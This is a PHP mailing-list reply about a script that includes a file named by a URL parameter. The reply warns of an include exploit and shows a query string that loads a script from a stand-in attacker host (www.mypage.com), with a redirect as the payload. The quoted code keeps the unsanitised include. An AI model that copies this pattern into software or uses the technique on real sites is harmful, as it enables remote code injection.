Em Sexta 30 Março 2007 13:17, Dwayne Heronimo escreveu: > where getting there .. now i have this.. but now it will only show the 404 > page. I think somehow that the firstpart is not working? the include part? > http://arubaguide.org/arubaguide/categories.php?catcode=activities > > > <?php require_once('../Connections/arubaguide.php'); ?> > > <?php > > $cat_item = $_GET['catcode']; > if(file_exists($cat_item)) { > include "$cat_item"; > } > else { > include "404.php"; > exit; > } >
include exploit: arq_inc.htm: <script> window.location="www.mypage.com"; </script> then: www.yourpage.com/script.php?catcode=http://www.mypage.com/arc_inc.htm o/ -- Davi Vidal [EMAIL PROTECTED] [EMAIL PROTECTED] -- Agora com fortune: ""The government is not the surplus's money, Vice President." George W. Bush November 5, 2000 From The Washington Post." -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
